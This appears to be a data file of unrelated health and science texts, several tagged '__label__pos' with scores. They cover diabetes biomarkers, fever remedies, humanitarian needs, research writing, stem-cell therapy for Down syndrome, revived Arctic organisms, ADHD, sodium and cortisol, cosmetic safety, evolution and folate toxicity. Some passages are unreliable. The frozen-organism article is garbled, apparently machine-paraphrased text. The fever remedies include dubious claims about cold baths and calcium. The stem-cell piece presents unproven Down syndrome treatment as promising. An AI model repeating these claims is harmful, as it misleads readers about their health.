eHSP72 (extracellular heat-shock protein 72) is increased in the plasma of both types of diabetes and is positively correlated with inflammatory markers. Since aging is associated with a low-grade inflammation and IR (insulin resistance), we aimed to: (i) analyse the concentration of eHSP72 in elderly people and determine correlation with insulin resistance, and (ii) determine the effects of eHSP72 on β-cell function and viability in human and rodent pancreatic β-cells. Fasting blood samples were collected from 50 older people [27 females and 23 males; 63.4±4.4 years of age; BMI (body mass index)=25.5±2.7 kg/m2]. Plasma samples were analysed for eHSP72, insulin, TNF (tumour necrosis factor)-α, leptin, adiponectin and cortisol, and glycaemic and lipid profile. In vitro studies were conducted using rodent islets and clonal rat and human pancreatic β-cell lines (BRIN-BD11 and 1.1B4 respectively). Cells/islets were incubated for 24 h with eHSP72 (0, 0.2, 4, 8 and 40 ng/ml). Cell viability was measured using three different methods. The impact of HSP72 on β-cell metabolic status was determined using Seahorse Bioscience XFe96 technology. To assess whether the effects of eHSP72 were mediated by Toll-like receptors (TLR2/TLR4), we co-incubated rodent islets with eHSP72 and the TLR2/TLR4 inhibitor OxPAPC (oxidized 1-palmitoyl-2-arachidonoyl-sn-glycero-3-phosphocholine; 30 μg/ml). We found a positive correlation between plasma eHSP72 and HOMA-IR (homoeostasis model assessment of IR) (r=0.528, P<0.001), TNF-α (r=0.389, P<0.014), cortisol (r=0.348, P<0.03) and leptin/adiponectin (r=0.334, P<0.03). In the in vitro studies, insulin secretion was decreased in an eHSP72 dose-dependent manner in BRIN-BD11 cells (from 257.7±33 to 84.1±10.2 μg/mg of protein per 24 h with 40 ng/ml eHSP72), and in islets in the presence of 40 ng/ml eHSP72 (from 0.48±0.07 to 0.33±0.009 μg/20 islets per 24 h). Similarly, eHSP72 reduced β-cell viability (at least 30% for BRIN-BD11 and 10% for 1.1B4 cells). Bioenergetic studies revealed that eHSP72 altered pancreatic β-cell metabolism. OxPAPC restored insulin secretion in islets incubated with 40 ng/ml eHSP72. In conclusion, we have demonstrated a positive correlation between eHSP72 and IR. In addition, we suggest that chronic eHSP72 exposure may mediate β-cell failure.
|
__label__pos
| 0.526327
|
Fever describes a condition in which the body’s temperature is higher than normal. It’s a symptom of many types of illnesses and is usually a response to infection or inflammation. Fever can also be caused by exposure to heat, poisons, certain drugs, or injuries to the brain. While it’s usually treated with medication, there are a handful of natural alternatives. Here are some natural fever relievers.
Fluids
Dehydration is often a result of fever, making the sick individual feel worse. The best way to counter this is to drink plenty of fluids. Make sure you drink enough to make your urine appear pale in color.
Note that while water is best, sports drinks (like Gatorade) and rehydration solutions (like Pedialyte) can help replace minerals and electrolytes lost to dehydration. Even grapes can serve as a source of hydration. Orange juice is also a great choice, due to its high vitamin C content. Note that vitamin C helps the immune system fight infection.
Calcium
Part of the reason you may feel achy with a fever is due to a process that removes calcium from your bones. This process allows the body to draw calcium from the bones for the purpose of fighting infection. Supplementation can help provide the needed calcium, reducing the need for drawing it from within the body.
A number of experts believe calcium can actually reduce the duration of an illness by increasing the effectiveness of the accompanying fever. One study involving dengue fever patients showed that supplementing with calcium and vitamin D (to assist in calcium absorption) helped reduce both the symptoms and duration of the illness.
Warm Bath
A warm bath is one of the best natural fever relievers, since it can directly impact your internal temperature. Note that the water will feel cool, because of the fever. Use a sponge to rise off delicate areas like the armpits and groin, since this can help you cool down more quickly. Avoid taking a cold bath, since this can increase blood flow to the organs, which will raise your temperature further.
Sleep
As difficult as it might be to get enough sleep sometimes, it’s one of the best ways to get over an illness more quickly. Rest makes it possible for your body to heal itself through natural processes. While your body is resting, it is producing more white blood cells to assist in the fight against infection. If you’re having trouble sleeping due to the illness, try taking a warm bath first, as described above.
Cold Compress
A cold compress is another effective way to reduce fever naturally. Apply a cool, wet cloth to the forehead or back of the neck for optimal effect. The base of the neck is where the hypothalamus is located, making it an ideal location on which to place the compress.
Note that while a hot compress is effective for relieving pain, it should not be used for a fever. The purpose of using a cold one is that as the water evaporates from the skin, it draws out the heat, reducing the body’s temperature. Once the cloth gets warm, remove it, soak it in some more cool water, wring it out and use it again.
Apple Cider Vinegar
Apple cider vinegar has been a popular fever remedy among grandmothers for generations. One way to use it is to soak a washcloth in diluted vinegar and place it on the forehead or abdomen. You can also wrap the cloth around the soles of your feet. The purpose of using the cloth is to provide a path along which the heat can be drawn out. Note that it can also be added to a warm bath or mixed into a glass of water with honey for direct consumption.
Keep in mind that fevers are a vital part of your body’s natural defense system. By raising your temperature, the body triggers your immune system and speeds up the detoxification process. While fevers might be unpleasant, they’re one of the best indications that your immune system is working the way it’s supposed to.
|
__label__pos
| 0.696777
|
Source: World VisionCountry: Democratic Republic of the Congo, Ethiopia, Kenya, Rwanda, Somalia, South Sudan, Sudan, Uganda, United Republic of TanzaniaKey messages• Humanitarian needs: At least 28 million people (more than half of them children) are in need of humanitarian assistance. Conflict, disease, acute food shortages, high inflation, and inadequate nutrition have left children and their families extremely vulnerable.• Conflict a major driver of forced displacements: Conflict continues to be a major factor driving people out of their homes. As the Democratic Republic of Congo prepares for elections in December, neighbouring countries such as Burundi and Uganda are on high alert for an influx of refugees. This therefore means that the number of people requiring humanitarian assistance will likely increase.• Food insecurity: At least 20 million are struggling to meet their daily food and nutrition needs
|
__label__pos
| 0.874484
|
FREQUENTLY ASKED QUESTIONS
How can I argue the importance of a Research Problem (PI)? In general, the importance of a PI is determined by the impact it has on health care. You must do it in the most objective way possible, based on documents that will be part of the bibliography. Some types of documents that may be of interest:
Epidemiological or statistical reports (particularly the reports of health institutions or the hospital itself). Reports made by scientific societies (consult their web pages). Health plans of the health authorities, both at the national and regional level (review institutional platforms, as there are numerous reports on health problems that they consider to be priorities).
How do I know that the Project is relevant? It is determined based on its adaptation to the priorities of the organization and the potential impact it has on both the citizen and the professionals. The project is expected to improve some health outcomes or quality of life in defined population groups, which, due to susceptibility or frequency of the problem, are especially vulnerable to it. It also provides alternatives to problems in the organization and the provision of health services, with an innovative and evaluable perspective in terms of cost-effectiveness. And also that it has a positive influence on the models of professional practice.
What databases can I use to perform the bibliographic search? Search specialized databases in the field of health. If you search in CUIDEN and in CINHAL, you will access 80% of the knowledge available in Nursing. In PUBMED, IBECS and in MEDES you can find works from other disciplines besides Nursing. In COCHRANE you can find systematic reviews (a good luck if you find one that is very related to your topic). Through DOAJ, SCIELO, CANTARIDA, DIALNET and GOOGLE SCHOLAR you can find the full text of the articles. More information SEE
Use selection criteria to limit searches, such as: subject area, type of study, type of documents (original articles, clinical cases, reviews, monographs, etc.), time limitation (scientific knowledge is considered to tend to renew for periods of 7 years, keep it in mind), language, etc.
What does CRITICAL ANALYSIS mean? It means that what you are going to obtain from the documents that you select will be presented, because of the interest you have to better understand the topic you are going to discuss. Therefore you should only review those data that serve to enrich your work, but not the rest.
How do I know which are the best documents? Learn to distinguish the main authors of other occasional authors. Locate the expert authors looking at the most cited among the bibliography that you locate. Often the best articles are published in the journals with the greatest impact, see the list of most cited journals in the JCR-SCI, SCOPUS or CUIDEN CITACION catalogs (https://ndr2014.org).
What if I do not find enough articles about what I’m looking for? One of two, or the search you have done is defective (most likely), in which case you have to continue trying with new strategies, or there is a knowledge gap on the subject. If so, describe it when you describe the background.
But do not settle, there may not be much about the specific problem that you will study, but there will be about the general theme in which it is located.
How can I identify the theoretical framework? What you are going to do with the theoretical framework is to clarify the theoretical perspective of the parties when raising your work. The ideal is to do it in two parts:
a) Anticipate the result you hope to achieve. What is your conviction? Do it by establishing a theoretical relationship between a cause and an effect, for example:
This work is based on the conviction that the limited recognition of family care is socially determined by the moral obligation of women as caregivers.
b) Complete the theoretical perspective with the support of higher-level theories that expand the understanding of the phenomenon of study (nursery theories, socio-cultural theories, etc. In the previous case, gender theories would be a good option).
What style should I use in the drafting of the IP? Use the 3C strategy: clarity, conciseness and correction.
Clarity means that the reading of the text will be pleasant, avoiding unnecessary technicalities. Fleeing the farfetched language (it is about impressing with content, not with verbiage). Concision responds to the saying “good if brief, twice good”. Limit yourself to the ideas that are strictly necessary, avoiding overwhelming the reader with additional content that only contribute to sow confusion. Correction means that what is written should follow what is expected in a well-constructed text from the syntactic and orthographic point of view. Everything you present during the tutorial period is of a provisional nature, but try to do it right from the beginning and you will gain time (for example, if you write down the bibliography properly from the beginning, you will avoid mistakes). Always write neatly, avoid typographical errors and spelling mistakes accompany you throughout the process or you will get used to them. How do I avoid typos in the text? Errata have a vital effect on TFGs, so we are going to make an effort to combat them with energy: If you miss an errata, you will probably find it in the final version of the document. Therefore you have to get used to writing correctly composed texts from the start. Neatness refers to the composition of the text, which must be free of typographical and typographical errors. Automatic scripts and epigraphs are often a source of mismatches in the text, so it is advisable to rationalize their use. We recommend that you learn to do them manually. Never lose control of the text. Expecial emphasis on bibliographic notation, learn soon to reference the bibliography properly, it is a major source of errors. Bibliographic managers can help, but also contribute to hinder learning. Before sending the text, even if it is only preliminary, you should review it in a thorough manner. It is not enough to trust the automatic corrector of the text, you have to review it again and again until everything is OK.
Can I work with texts from other authors without incurring problems of plagiarism or piracy? Yes, but keep in mind a sacred rule: never use the COPIO-PEGO system or in the end you will not know what is yours and what is not. The right thing to do: read several times until you become familiar with the text you have selected, write down in a separate file the main ideas with your own words and identify the bibliographic reference of where you have taken them.
If you decide to enter the literal text of someone, try to indicate it in quotes, always identifying the author. You should not include literal paragraphs greater than ten lines, to avoid conflicts over copyright.
|
__label__pos
| 0.787112
|
Publication Overview
Increasing competition for resources across the globe reveals the finite nature of the resources that fuel our societies. The study of peak resource consumption originated with the concept of “peak oil,” the idea that oil production will reach an upper limit and then decline. Applied to water resources, the concept of “peak water” illustrates the tension between the human need for water and the ecological limits of using that water. Understanding the links between human demands for water and peak water constraints can help water managers and planners move towards more sustainable water management and use.
|
__label__pos
| 0.999933
|
Psychoactive substance consumption in recreational settings among university students in ColombiaAcademic Article
Overview
Research
Identity
Additional Document Info
View All
Overview
abstract
The consumption of psychoactive substances (PAS) is a public health problem in Colombia and worldwide. The people who consume such substances are becoming younger, and their effects are potentially harmful and may affect all areas of adjustment of the individual. Although it has been conceived that way, the use of PAS is not always associated with personal problems or high degrees of stress. There may be other motivations associated. Objective: The objectives of this article are to present: (a) the relative frequency of consumption of PAS among college students, (b) which are the PAS consumed most by college students and differences in their consumption by sex and by age, (3) the relationship between the consumption of PAS and contexts of diversion. Materials and methods: This is a descriptive correlational study derived from an Italian research project, in which the sample were 226 college students from four undergraduate programs of a private university in Bogotá DC, selected using a stratified random sampling procedure with proportional allocation. Participants filled out a questionnaire. Results: The PAS with the highest consumption were alcohol, nicotine and marijuana. Males predominantly showed an increased consumption. The results are consistent with the national trend. Conclusion: The consumption of SPA among college students is high and some recreational contexts are closely associated with this behaviour.
|
__label__pos
| 0.960406
|
Without a doubt, stem cells are one of the biggest medical breakthroughs in the case of studying and treating various diseases. Because of them, researchers can better understand how disease develops and can create effective treatment options without testing it on an actual patient. It is because of these benefits that stem cell therapy, also known as regenerative medicine, is considered one of the most promising advancements in medicine for disease treatment.
Though stem cell therapy is still a relatively new developing medicine, studies and research are leading researchers to believe that stem cell therapy will be a humongous medical development that will benefit various patients dealing with a large number of diseases, injuries, and other ailments. While the most common stem cell treatment options are for various types of cancers, heart disease, and injuries, one approach has been less discussed. Here we’ll explore how stem cell therapy can treat Down Syndrome.
Down Syndrome Development
Down Syndrome occurs when a person is born with an extra copy of the 21st chromosome. This changes how the body and brain develops, according to the U.S. Centers for Disease Control and Prevention. In addition, the CDC also states that Down Syndrome continues to be the most common chromosomal disorder, with about 6,000 babies being born with Down Syndrome each year. Or in other words, 1 in very 700 babies born. Between 1979 and 2003, the number of babies born with Down Syndrome increased by 30%. It also seems the prevalence of Down Syndrome increases as the mother of the baby’s age increases.
Stem Cell Therapy for Down Syndrome
Though stem cell therapy treating Down Syndrome is still very early in development, there have been studies done that prove stem cell therapy could be an effective treatment. Data collected showed that over 300 Down Syndrome patients had been treated with neural stem cell therapy in some studies. The ages of the patients ranged from 8 months to 8 years. After these treatments, it was reported that the patients showed varied levels of improvement in intellectual development, speech, muscle strength, reaction velocity, and gait.
This year, doctors in New Delhi, India, treated a baby with Down Syndrome with stem cells. Geeta Shroff, a stem cell expert, noted that after the treatment, there were parts of the baby’s body that started improving, such as muscle tone and some movement. It was also noted the baby showed improvement mentally and physically in a relatively short period of time. This, according to Shroff, happened after three months of the treatment. Some examples of the improvements that developed in the baby after stem cell therapy included better muscle tone in all limbs, heightened babbling and crawling, and also recognizing those near him after the first session of stem cell therapy. Though this was only one case with stem cell therapy and Down Syndrome, researchers are hopeful this can be the beginning of a major breakthrough.
Join our Stem Cell Discussion & Information Facebook Group today!
It is also believed that with Down Syndrome, stem cell therapy can be effective in terms of targeting a specific gene before birth that could lead to a target treatment. This treatment would consist of reversing abnormal embryonic brain development and working to improve cognitive function after birth. This belief came about with a Rutgers-led study done using skin cells from a patient with Down Syndrome and manipulating them into human-induced pluripotent stem cells. These stem cells contained the extra copy of the 21st chromosome that leads to the development of Down Syndrome, and allowed scientists to further understand development of Down Syndrome, along with which gene to target for treatment. This would be the human chromosome 21 gene OLIG2. By using the induced pluripotent stem cells, scientists were able to create a brain model that mirrored the patients, and this provided for a great research point.
The Future with Down Syndrome and Stem Cell Treatments
As stem cell therapy is still relatively in development, there are still long strides to go before the treatments are deemed perfect for larger treatment. Stem cell therapies in general are still slowly being approved, and there is still plenty of research that needs to be conducted. One example would be Japan’s recent approval of stem cell therapies for the spinal cord. This approval was based largely on a study in which patients which were injected with stem cells extracted from their own bone marrow. The team leading this study found that the patients regained some movement and sensation. However, the approval for this stem cell therapy is garnering some concern due to lack of research and insufficient trials. Studies like the Rutgers-led study have proven that stem cells can be used to develop a greater understanding of Down Syndrome and targeting the specific gene for proper treatment.
The future of Down Syndrome and stem cell therapy still has a long road ahead. However, recent studies and research have shown that stem cell therapy may lead to a successful treatment of Down Syndrome. There is still plenty of trials and studies that must be conducted, but hopefully in time, further research and results can reassure scientists that stem cell therapy will be a healthy and safe treatment for Down Syndrome. If stem cell therapy proves to be successful and safe, his will no doubt be a medical breakthrough that will enrich the lives of many patients with Down Syndrome and lead to more successful treatment of this condition for future generations.
Learn More About Stem Cell Therapy Download our FREE Stem Cell Report
Click below to download our free educational report, Stem Cell 101!
|
__label__pos
| 0.901529
|
In recent times, researchers have reawakened life in frozen organisms within the Arctic permafrost, bringing them again to life. These research are actually difficult accepted concepts as to the resilience of lifeforms, indicating the way forward for the atmosphere after world warming , and even the possibilities of life on different planets. They’ve revived moss and even worms that had been assumed useless in glaciers and within the frozen earth however are actually usually being revealed by thawing glaciers.
Moss Revival After 150 Years
In 2009, Catherine Le Farge, an evolutionary biologist, and her colleagues have been working on the fringe of a large glacier often known as the Teardrop, in Northern Canada. She got here throughout quite a few specimens of moss “of the species Aulacomnium turgidum lastly free from its icy entombment,” based on Stuff. There have been some inexperienced tints on the plant, although it had been frozen in ice because the mid-19th century.
This materials was presumed to be useless however the verdant hues on the moss indicated to Le Farge that this was one thing value investigating. She determined to convey the samples again to her College in Edmonton and positioned them in nutrient-rich soil in a brilliant and heat atmosphere. After a time frame, quite a few the mosses got here into leaf, regardless of being ‘useless’ for over a century. Le Farge is quoted by Stuff as stating that “We have been fairly blown away.”
The moss had desiccated within the excessive chilly and this meant that it didn’t turn into frozen strong. Usually, ice can kind within the tissues of dwelling and useless organisms and which means it “can shred cell membranes and different important organic equipment” based on Stuff. This distinctive organic attribute of moss meant that it may very well be revived.
Frozen lifeforms, such because the moss, have been efficiently revived. (angelacina1 / Public Area ) Frozen Worms Woke up
Following on from the work of Le Farge and her colleagues, different scientists have begun to revive frozen organisms. Peter Convey and his staff from the British Antarctic Survey have “woke up a 1500-year-old moss buried greater than three ft underground within the Antarctic permafrost,” based on Annith. It seems that the frozen ice can protect the mosses from environmental harm and the radiation that may result in the break-down of their DNA and protect the vegetation.
Researchers have been capable of renew and convey to life micro organism and complicated a number of cell organisms which were entombed in glaciers . Some of the thrilling situations of that is the work of Tatiana Vishnivetskaya, from the College of Tennessee, on nematodes (roundworms), which might be hundreds of years outdated and have been discovered within the Tundra of Siberia.
She introduced an ‘unintended discovery’ when she was working with the organisms in Petrie dishes says
Stuff . The scientist noticed the worms reawakening , although they’d been frozen for hundreds of years. Her work has proven that it’s not solely a easy organism that may survive within the brutal atmosphere of extraordinarily low temperatures. Researchers have revived frozen lifeforms from the Arctic, akin to worms. (John Donges / CC BY-SA 2.0 )
The latest analysis has proven that desolate areas just like the Arctic usually are not simply useless zones. As an alternative, it seems that “glaciers and permafrost usually are not merely graveyards for multicellular life” based on Stuff. Additionally it is displaying {that a} choose few species have nice resilience.
It additionally seems that some organisms can await a extra favorable atmosphere as a part of their survival technique. They’re able to keep actually frozen in time or turn into ‘ zombies’ till situations imply that they are often revived.
What Does This Say About Life on Different Planets?
Some imagine that the power of organisms to outlive within the excessive chilly can have repercussions for the opportunity of life on different planets . If lifeforms can survive in a glacier may they not additionally survive in apparently desolate and uninhabitable worlds ? The resilience of sure organisms might make it extra possible that life might exist elsewhere within the universe.
Northern polar ice cap on Mars. Does the ice maintain frozen lifeforms? (Fabio Bettani / Public Area )
The invention that some organisms can survive within the excessive chilly may also help us perceive how areas, which are actually frozen, might take care of world warming. Because the glaciers and permafrost thaws and retreats, it signifies that one thing that may survive within the ice can re-colonize the atmosphere. For instance, mosses can flourish as soon as once more and put together the best way for different vegetation and even animals to colonize previously frozen lands.
The research by Le Farge, Covney, and others are demonstrating that historical life will be renewed and the resilience of some types of organic life . That is very optimistic given the rising considerations over the atmosphere. The analysis might give hope that life will have the ability to survive even the upcoming environmental disasters predicted by many scientists and environmentalists.
BAS, the staff learning the frozen lifeforms, analysis stations within the British Antarctic Territory. (Ravenpuff / CC BY-SA 3.0 ) Prime picture: Ellesmere Island Canada the place researchers are reviving frozen lifeforms. Supply: James / Adobe Inventory.
By Ed Whelan
|
__label__pos
| 0.803529
|
Flashcards in Paediatric Behavioral and Psych Disorders Deck (9):
1
What are some clinical features on history that parents often identify that may indicate that their child has autism? Parents often identify that something is different about their child before the second birthday. Early features include lack of pretend play,pointing out object to another person, and social interest and social play
2
What is the difference between aspergers syndrome and autism? Asperger's syndrome is used to describe individuals with normal intelligence no obvious delay in language development but impaired social and communication skills with an ego egocentric approach to others. They often exhibit a range of obsessional interests, and some social immaturity
3
How might we manage functional constipation in a child? • Behavioural modifications- positioning on toilet, toileting after meals • Positive reinforcement of toileting behaviour • Increasing dietary intake and ensure adequate hydration • Oral osmotic laxatives are first line like Movicol. Use daily longterm if needed. In infants use coloxyl drops • If inpatient, can use NGT with macrogol (glycoprep) which is the same thing as movicol; if severe disimpaction may be considered Arrange follow up in continence/encopresis clinic or general medical clinic for difficult cases
4
define the clinical features of ADHD? (DSM 5) inattention, hyperactivity, impulsivity that has persisted > 6 months to a degree that is maladaptive and inconsistent with developmental level. onset can be NO LATER than 7 yrs of age disturbances cause significant distress and social/functional/occupational impairment not better explained by other medical/mental illness
5
how might we examine/ix a child with ADHD? Neurodevelopment assessment: fine and gross motor coordination, visual‐motor integration, auditory and visual sequencing. • School reports. • Psychoeducational assessment: An educational psychologist performs a formal assessment to identify their learning strengths and weaknesses. • Audiology including auditory processing assessment is often helpful.
6
describe the stepwise management of ADHD? 1. behavioural modification with positive reinforcement 2. educational support strategies 3. medical management with dexamphetamine/clonidine/atomoxetine
7
what are some management advice you can give to the parent of a 'fussy eater'? Showing independence is an important part of toddler development – choosing and refusing food is an expression of independence. • Serve small portions – lower expectations. • Change the way food is presented. • Include limited healthy options and allow the child to choose among the options. • Include some healthy food choices that they like. Offering cereal at lunch is okay! A lack of variety is not a major worry at this age. • Avoid filling up on milk and juice. Large volumes of milk (> 600 mL a day) can make the child feel full. Juice is not necessary in the child’s diet. • Give the child time to enjoy the meal without comment. Remove the food after 30 minutes or if they dawdle or lose interest.
8
define primary and secondary enuresis? primary enuresis- continuously wet for at least 6 months secondary enuresis- child was previously dry for at least 6 months and has now relapsed
9
|
__label__pos
| 0.934511
|
Evaluating your likely current (and near future) state of health means taking into account the risk factors — such as diabetes in relatives — that affect you.
Our medical diagnosis tool, The Analyst™, identifies major risk factors by asking the right questions.
Diabetes in
either distant or close relatives?
Possible responses:→ None / don't know
→ Yes, in a distant relative
→ Yes, in 1 direct or 2 distant relatives
→ Yes, in 2 direct relatives
→ Yes, in more than 2 direct relatives
If you have a family history of high blood pressure, heart or kidney disease,
diabetes or stroke, you should have your blood pressure tested annually.
|
__label__pos
| 0.805455
|
Abstract and Introduction Abstract Objective High sodium (HS) diet is associated with hypertension (HT) and insulin resistance (IR). We evaluated whether HS diet was associated with a dysregulation of cortisol production and metabolic syndrome (MetS). Patients and measurements We recruited 370 adults (18–85 years, BMI 29·3 ± 4·4 kg/m 2, 70% women, 72% HT, 61% MetS). HS diet (urinary sodium >150 mEq/day) was observed in 70% of subjects. We measured plasma hormones, lipid profile, urinary free cortisol (UFC) and cortisol tetrahydrometabolites (THM). Results Urinary sodium was correlated with UFC ( r = +0·45, P < 0·001), cortisol THM ( r = +0·41, P < 0·001) and inversely with adiponectin, HDL and aldosterone, after adjusting by age, gender and BMI. Subjects with high, compared with adequate sodium intake (50–149 mEq/day) had higher UFC ( P < 0·001), THM ( P < 0·001), HOMA-IR ( P = 0·04), HT (81% vs 50%, P < 0·001), MetS (69% vs 41%, P < 0·001) and lower adiponectin ( P = 0·003). A multivariate predictive model adjusted by confounders showed a high discriminative capacity for MetS (ROC curve 0·878) using four clinical variables: HS intake [OR = 5·6 (CI 2·3–15·3)], HOMA-IR [OR 1·7 (1·3–2·2)] cortisol THM [OR 1·2 (1·1–1·4)] and adiponectin [OR = 0·9 (0·8–0·9)], the latter had a protective effect. Conclusions High sodium diet was associated with increased urinary cortisol and its metabolites. Also, HS diet was associated with HT, insulin resistance, dyslipidaemia and hypoadiponectinaemia, even when adjusting by confounding variables. Further, we observed that high salt intake, IR and higher cortisol metabolites, alone or combined in a clinical simple model, accurately predicted MetS status, suggesting an additive mechanism in obesity-related metabolic disorders. Introduction
Central obesity, hypertension, derangement of glucose and lipid metabolism are hallmarks of the metabolic syndrome (MetS), which is highly prevalent worldwide.
[1] The mechanisms leading to MetS are not fully understood, but several complementary hypotheses have been proposed including insulin resistance (IR), adipose tissue dysregulation, inadequate aldosterone suppression and increased cortisol production. [2,3]
Populations with liberal salt intake have higher incidences of HT and cardiovascular events, and its related health outcomes are associated with high medical costs.
[4] Moreover, high sodium intake has been reported to be an important clinical factor implicated in salt sensitivity in MetS. [5] There is also a reported relationship between increased sodium intake and insulin resistance (IR) and type 2 diabetes mellitus (T2DM). [6] Numerous mechanisms have been postulated to explain why liberal sodium intake contributes to metabolic disorders, with special emphasis in inadequate aldosterone suppression and increased mineralocorticoid receptor (MR) activation by factors other than aldosterone. [7,8]
We and others have shown that obesity and MetS, when correctly excluding subclinical Cushing's syndrome, are associated with increased levels of urinary glucocorticoid (GC) metabolites, but normal plasma values.
[3,9,10] Moreover, GC metabolites levels are correlated with HT, IR and dyslipidaemia, resembling metabolic abnormalities observed with liberal salt intake. [3] Although the relationship between high sodium diet and GC production has been less studied than aldosterone, it has been described that high sodium diet increases local GC production in a rodent model and that salt loading increases urinary cortisol and sodium restriction decreases cortisol excretion in human studies. [11,12,13]
The aim of the present study was to evaluate a possible dysregulation of cortisol production secondary to liberal sodium intake that could have an essential role in MetS and obesity-related metabolic disorders.
Clin Endocrinol. 2014;80(5):677-684. © 2014 Blackwell Publishing
|
__label__pos
| 0.663807
|
We attempt to review the safety assessment of personal care products (PCP) and ingredients that are representative and pose complex safety issues. PCP are generally applied to human skin and mainly produce local exposure, although skin penetration or use in the oral cavity, on the face, lips, eyes and mucosa may also produce human systemic exposure. In the EU, US and Japan, the safety of PCP is regulated under cosmetic and/or drug regulations. Oxidative hair dyes contain arylamines, the most chemically reactive ingredients of PCP. Although arylamines have an allergic potential, taking into account the high number of consumers exposed, the incidence and prevalence of hair dye allergy appears to be low and stable. A recent (2001) epidemiology study suggested an association of oxidative hair dye use and increased bladder cancer risk in consumers, although this was not confirmed by subsequent or previous epidemiologic investigations. The results of genetic toxicity, carcinogenicity and reproductive toxicity studies suggest that modern hair dyes and their ingredients pose no genotoxic, carcinogenic or reproductive risk. Recent reports suggest that arylamines contained in oxidative hair dyes are N-acetylated in human or mammalian skin resulting in systemic exposure to traces of detoxified, i.e. non-genotoxic, metabolites, whereas human hepatocytes were unable to transform hair dye arylamines to potentially carcinogenic metabolites. An expert panel of the International Agency on Research of Cancer (IARC) concluded that there is no evidence for a causal association of hair dye exposure with an elevated cancer risk in consumers. Ultraviolet filters have important benefits by protecting the consumer against adverse effects of UV radiation; these substances undergo a stringent safety evaluation under current international regulations prior to their marketing. Concerns were also raised about the safety of solid nanoparticles in PCP, mainly TiO(2) and ZnO in sunscreens. However, current evidence suggests that these particles are non-toxic, do not penetrate into or through normal or compromised human skin and, therefore, pose no risk to human health. The increasing use of natural plant ingredients in personal care products raised new safety issues that require novel approaches to their safety evaluation similar to those of plant-derived food ingredients. For example, the Threshold of Toxicological Concern (TTC) is a promising tool to assess the safety of substances present at trace levels as well as minor ingredients of plant-derived substances. The potential human systemic exposure to PCP ingredients is increasingly estimated on the basis of in vitro skin penetration data. However, new evidence suggests that the in vitro test may overestimate human systemic exposure to PCP ingredients due to the absence of metabolism in cadaver skin or misclassification of skin residues that, in vivo, remain in the stratum corneum or hair follicle openings, i.e. outside the living skin. Overall, today's safety assessment of PCP and their ingredients is not only based on science, but also on their respective regulatory status as well as other issues, such as the ethics of animal testing. Nevertheless, the record shows that today's PCP are safe and offer multiple benefits to quality of life and health of the consumer. In the interest of all stakeholders, consumers, regulatory bodies and producers, there is an urgent need for an international harmonization on the status and safety requirements of these products and their ingredients.
|
__label__pos
| 0.672856
|
MECHANISMS FOR EVOLUTION. Honors Biology. REVIEW. Evidence for Evolution and Examples What is Natural Selection? How did Darwin develop theory of Natural Selection?. PATTERNS OF EVOLUTION. Coevolution: 2 or more species evolve in association with one another
Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.
MECHANISMS FOR EVOLUTION Honors Biology REVIEW • Evidence for Evolution and Examples • What is Natural Selection? • How did Darwin develop theory of Natural Selection? PATTERNS OF EVOLUTION • Coevolution: • 2 or more species evolve in association with one another • Predators and Prey • Plants and Pollinators • Bats and Flowers PATTERNS OF EVOLUTION • Convergent Evolution: • Organisms that look similar but are not related • Analogous features • Similar environments • Sharks and Dolphins PATTERNS OF EVOLUTION • Divergent Evolution • 2 or more related populations or species become more and more dissimilar • Usually a response to new habitat • Can result in new species • Adaptive radiation • Artificial Breeding • Humans and Chimps POPULATION GENETICS AND EVOLUTION • What did Darwin know? • Environment is important • Competition for Resources • Natural Selection: Individuals with traits more suitable for a particular environment are more likely to survive AND reproduce • What did Darwin not know? • Where does variation come from POPULATION GENETICS • We now know that variation comes from genetics; no variation extinction • Population genetics: study of evolution from genetic point of view WHAT CAUSES VARIATION • Need to think about variation in GENOTYPE • Mutation: change in DNA/chromosomes • Recombination: during meiosis • Random fusion of gametes OTHER MECHANISMS FOR EVOLUTION • Things that upset genetic equilibrium • Using Hardy Weinberg you can predict genotypes; Only in hypothetical populations MUTATION • Change in DNA or chromosomes • Make new alleles for a trait • Many are harmful • Can be neutral (code for same amino acid) • Some are beneficial MIGRATION/GENE FLOW • Call it gene flow • Populations exchange genes • Increases within group variation • Decreases between group variation • DOESN’T HAVE TO BE MIGRATION GENETIC DRIFT • Occurs in small populations • Allele frequencies shift as a result of RANDOM events • Coin Toss • Founders Effect; Bottleneck NONRANDOM MATING • Sexual Selection • Positive assortative mating – mate with someone similar • Negative assortative mating: redheads! NATURAL SELECTION • Darwin and neoDarwinians believe is the most important way evolution occurs • Types of Selection STABILIZING SELECTION • Average form are selected for • Lizards: • Predators caught slow small and large visible • Select for medium size DIRECTIONAL SELECTION • Individuals with an extreme trait are selected for • Anteaters with long tongues DISRUPTIVE SELECTION • Individuals with either extreme are selected for • Limpet shell color; light and dark on different surfaces SEXUAL SELECTION • Choosing mates based on traits • Intersexual Selection • Intrasexual Selection • Bird Color SPECIATION • If enough changes accumulate new species • Biological concept of species: organisms can mate and produce fertile offspring; not just morphological (what they look like) • Isolating mechanisms speciation • Geographic isolation • Reproductive isolation SPECIATION • Rates of speciation • Gradualism: species evolve gradually over time • Punctuated equilibrium: species go through times of fast change and slow or no change
|
__label__pos
| 0.972002
|
Folate, folic acid and folacin are the terms for the vitamin B-complex that is known for its vital role in pregnancy. This drug is important to avoid pregnancy defects such as malformation of the neural tube. Spinal problem and serious brain damage could be a result of a malformed neural tube. This vitamin has three components namely:
PABA Glutamic acid Pteridine
Before taking folate, patients should approach a physician so that the tolerable upper intake level of folate will be determined properly. Folate intake should not exceed the recommended dosage. Studies have shown that folate intake of doses greater than 1,000-2,000 µg could cause folate toxicity.Excessive intake of folic acid has no known health benefits.
Folate Poisoning Symptoms
Folate toxicity is not common since folic acid is soluble in water it could be easily excreted through urination. Over dose of folic acid will give the person mostly the same symptoms that could be experienced by the person having an insufficiency of it. Several symptoms of folate toxicity include:
Nervous system disorders Gastrointestinal problems such as diarrhea Abdominal problems Irritability Sleep problems such as insomnia. Fatigue Malaise Skin reactions Seizures Reduce effectiveness of anticancer drug (methotrexate), anticonvulsant drugs, barbiturates, estrogen, zinc, sulfasalazine, antimalarial treatments Affects the absorption of vitamin B12
